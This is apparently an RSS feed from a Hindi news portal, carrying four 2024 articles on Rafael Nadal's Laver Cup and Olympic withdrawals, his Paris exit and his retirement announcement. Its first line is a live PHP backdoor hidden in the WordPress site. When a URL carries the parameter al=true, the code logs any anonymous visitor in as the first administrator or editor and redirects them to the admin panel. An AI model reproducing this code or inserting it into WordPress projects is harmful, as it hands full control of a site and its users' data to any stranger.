// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Rafael Nadal – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Thu, 10 Oct 2024 15:46:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 नडाल ने संन्यास का किया ऐलान, 22 बार रह चुके हैं ग्रैंड स्लैम चैंपियन https://pratyushaashakinayikiran.com/?p=82584 Thu, 10 Oct 2024 15:46:00 +0000 https://pratyushaashakinayikiran.com/?p=82584 मैड्रिड

स्पेन के महान टेनिस खिलाड़ी राफेल नडाल ने इस खेल को अलविदा कह दिया है। उन्होंने गुरुवार 10 अक्टूबर को सोशल मीडिया पर एक वीडियो जारी करते हुए अपने रिटायरमेंट की जानकारी दी। सिंगल्स में 22 ग्रैंड स्लैम खिताब जीतने वाले राफेल नडाल ने कहा कि वह अपने प्रोफेशनल टेनिस करियर को समाप्त कर रहे हैं। यह निर्णय डेविस कप फाइनल के बाद प्रभावी होगा। 38 वर्षीय खिलाड़ी ने रिकॉर्ड 14 बार फ्रेंच ओपन का खिताब जीता है और इसी वजह से उनको लाल बजरी का बादशाह कहा जाता, क्योंकि फ्रेंच ओपन क्ले कोर्ट (लाल मिट्टी) पर होता है।

राफेल नडाल ने सोशल मीडिया पर एक वीडियो जारी किया, जिसमें उन्होंने कहा, "यह कुछ कठिन वर्ष रहे हैं, खासकर पिछले दो साल। मैं बहुत उत्साहित हूं कि मेरा आखिरी टूर्नामेंट मेरे देश का प्रतिनिधित्व करने वाला डेविस कप होगा। यह चक्र पूरा हो रहा है, क्योंकि मेरी पहली खुशियों में से एक 2004 में सेविला में फाइनल था।"

डेविस कप के नॉकआउट मैच 19 नवंबर से शुरू होंगे। 24 नवंबर को फाइनल मुकाबला खेला जाएगा। इस टूर्नामेंट में जहां तक स्पेन की टीम खेलेगी, वही मैच राफेल नडाल का आखिरी मैच होगा। नडाल का करियर चोटों से प्रभावित रहा है और वह 2023 फ्रेंच ओपन से चूक गए थे और इस साल उन्हें पहले दौर में जर्मन अलेक्जेंडर ज्वेरेव ने हराया था। उन्होंने अपना आखिरी रोलैंड गैरोस खिताब 2022 में जीता और पेरिस क्ले को 112-4 की जीत-हार के रिकॉर्ड के साथ छोड़ा है।

]]>
राफेल नडाल ने लेवर कप से नाम वापस लिया https://pratyushaashakinayikiran.com/?p=69998 Fri, 13 Sep 2024 16:44:00 +0000 https://pratyushaashakinayikiran.com/?p=69998 बर्लिन
पूर्व विश्व नंबर 1 राफेल नडाल ने अगले सप्ताह बर्लिन में होने वाले लेवर कप से नाम वापस ले लिया है, टूर्नामेंट ने इसकी घोषणा की। सोशल मीडिया पर इवेंट द्वारा जारी किए गए ट्वीट में नडाल ने कहा, “मुझे यह बताते हुए बहुत निराशा हो रही है कि मैं अगले सप्ताह बर्लिन में होने वाले लेवर कप में भाग नहीं ले पाऊंगा। “यह एक टीम प्रतियोगिता है और टीम यूरोप का वास्तव में समर्थन करने के लिए, मुझे उनके लिए सबसे अच्छा करने की आवश्यकता है और इस समय अन्य खिलाड़ी भी हैं जो टीम को जीत दिलाने में मदद कर सकते हैं।

“लेवर कप खेलने से जुड़ी मेरी बहुत सारी शानदार, भावनात्मक यादें हैं और मैं अपने साथियों और कप्तान के रूप में अपने अंतिम वर्ष में ब्योर्न बोर्ग के साथ होने का वास्तव में बेसब्री से इंतजार कर रहा था। मैं टीम यूरोप को शुभकामनाएं देता हूं और दूर से ही उनका उत्साहवर्धन करूंगा।” स्पेन के इस खिलाड़ी ने लेवर कप के सातवें संस्करण के लिए टीम यूरोप का साथ दिया था, जिसका आयोजन 20-22 सितंबर तक बर्लिन के उबेर एरिना में किया जाएगा। पेरिस 2024 ओलंपिक के बाद, नडाल ने पुष्टि की थी कि 2024 के लिए लेवर कप उनका अगला इवेंट होगा।

बर्लिन लेवर कप में नडाल का चौथा प्रदर्शन होता, इससे पहले उन्होंने 2017 में प्राग, 2019 में जिनेवा और फिर 2022 में लंदन के ओ2 में फेडरर के करियर के आखिरी मैच के लिए करीबी दोस्त और लंबे समय के प्रतिद्वंद्वी रोजर फेडरर के साथ युगल में हिस्सा लिया था। 22 बार के ग्रैंड स्लैम चैंपियन ने पहले संकेत दिया था कि 2024 उनके दौरे का आखिरी साल हो सकता है। नडाल का इस सीजन में 12-7 मैच रिकॉर्ड है और उन्होंने आखिरी बार पेरिस ओलंपिक में हिस्सा लिया था, जहां वे दूसरे दौर में नोवाक जोकोविच से हार गए थे।

 

]]>
नडाल सुनिश्चित नहीं की पेरिस में दोबारा खेलेंगे या नहीं https://pratyushaashakinayikiran.com/?p=56314 Thu, 01 Aug 2024 15:49:00 +0000 https://pratyushaashakinayikiran.com/?p=56314 पेरिस
रोला गैरां की लाल बजरी के बादशाह राफेल नडाल इसको लेकर सुनिश्चित नहीं है कि वह फिर से पेरिस के इस ऐतिहासिक टेनिस स्थल पर खेल पाएंगे या नहीं जहां उन्होंने रिकॉर्ड 14 फ्रेंच ओपन खिताब जीते हैं।

इस दिग्गज टेनिस खिलाड़ी का पुरुष युगल में हारने के साथ ही ओलंपिक में सफर भी समाप्त हो गया। नडाल और कार्लोस अल्काराज की स्पेनिश जोड़ी को ऑस्टिन क्राजिसेक और राजीव राम की चौथी वरीयता प्राप्त अमेरिकी जोड़ी ने 6-2, 6-4 से हराया।

इससे पहले पुरुष एकल में नोवाक जोकोविच से हारने वाले नडाल से जब बाद में पूछा गया कि क्या उन्होंने यहां अपना आखिरी मैच खेल लिया है, उन्होंने कहा,‘‘हो सकता है। मैं नहीं जानता।’’

इस 38 वर्षीय खिलाड़ी ने अपना सामान उठाने के बाद चारों तरफ देखा। ऐसी जगह जो उनके लिए बहुत मायने रखती है। उन्होंने दर्शकों की तरफ हाथ हिलाया और दर्शकों ने भी खड़े होकर तालियां बजाकर उनका अभिवादन स्वीकार किया।

नडाल ने कहा, ‘‘अगर मैंने यहां अपना आखिरी मैच खेल लिया है तो यह अविस्मरणीय अहसास और भावनाएं हैं। मुझे हमेशा यहां दर्शकों का अपार समर्थन और प्यार मिला।’’

दर्शकों ने क्वार्टर फाइनल के इस पूरे मैच के दौरान नडाल के लिए तालियां बजाई और उनके समर्थन में गीत गाए।

नडाल ने कहा, ‘‘मुझे नहीं पता कि भविष्य में क्या होने वाला है, लेकिन अगर यह आखिरी बार है, तो मैंने इसका आनंद लिया।’’

यह मैच कोर्ट फिलिप चैटरियर में खेला गया था। यह वही कोर्ट है जहां नडाल ने अपने 22 ग्रैंडस्लैम खिताब में से 14 खिताब जीते।

]]>
राफेल नडाल ने ओलंपिक्‍स में सिंगल्‍स इवेंट में हिस्‍सा लेने से किया इन्‍कार https://pratyushaashakinayikiran.com/?p=55265 Sun, 28 Jul 2024 19:16:00 +0000 https://pratyushaashakinayikiran.com/?p=55265 पेरिस
 दुनिया के दिग्‍गज टेनिस खिलाड़ी राफेल नडाल ने पेरिस ओलंपिक्‍स 2024 को लेकर ऐसा फैसला किया है, जिसने फैंस को हैरान कर दिया है। राफेल नडाल ने पेरिस ओलंपिक्‍स 2024 में सिंगल्‍स इवेंट में हिस्‍सा लेने से इन्‍कार कर दिया है। नडाल इस समय चोट से पूरी तरह ठीक नहीं हुए हैं और उन्‍होंने डबल्‍स में खेलने में दिलचस्‍पी दिखाई है। नडाल ओलंपिक्‍स में कार्लोस अलकारज के साथ जोड़ी बनाकर स्‍पेन का प्रतिनिधित्‍व कर रहे हैं।

]]>